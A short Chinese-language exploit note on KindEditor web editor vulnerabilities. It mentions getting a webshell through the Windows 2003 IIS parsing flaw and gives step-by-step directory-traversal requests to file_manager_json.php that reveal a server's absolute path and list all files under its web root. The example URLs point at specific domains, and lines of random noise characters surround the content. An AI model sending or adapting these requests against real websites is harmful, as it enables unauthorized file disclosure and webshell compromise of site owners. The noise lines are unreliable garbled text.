影响版本:<= kindeditor 3.2.1(09年8月份发布的最新版)
漏洞利用:利用windows 2003 IIS解析漏洞拿WEBSHELL
: ?0 P6 D- ]: {. F7 H" A" h3 ]% C5 u) Q6 W
KindEditor列目录漏洞
测试版本:KindEditor 3.4.2 KindEditor 3.5.5
- http://www.political-security.com/67cms/kindeditor/php/file_manager_json.php?path=/
- //path=/,爆出绝对路径D:AppServwww67cmskindeditorphpfile_manager_json.php
- 2.http://netknight.in/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
- //根据爆出的绝对路径,修改path的值为AppServ/www/67cms/
- 这时将遍历d:/AppServ/www/67cms/下的所有文件和文件名
! [ ^: `8 { a$ G" @1 M* l
4 a# |4 w+ Z5 A% `% q* \7 p- E) w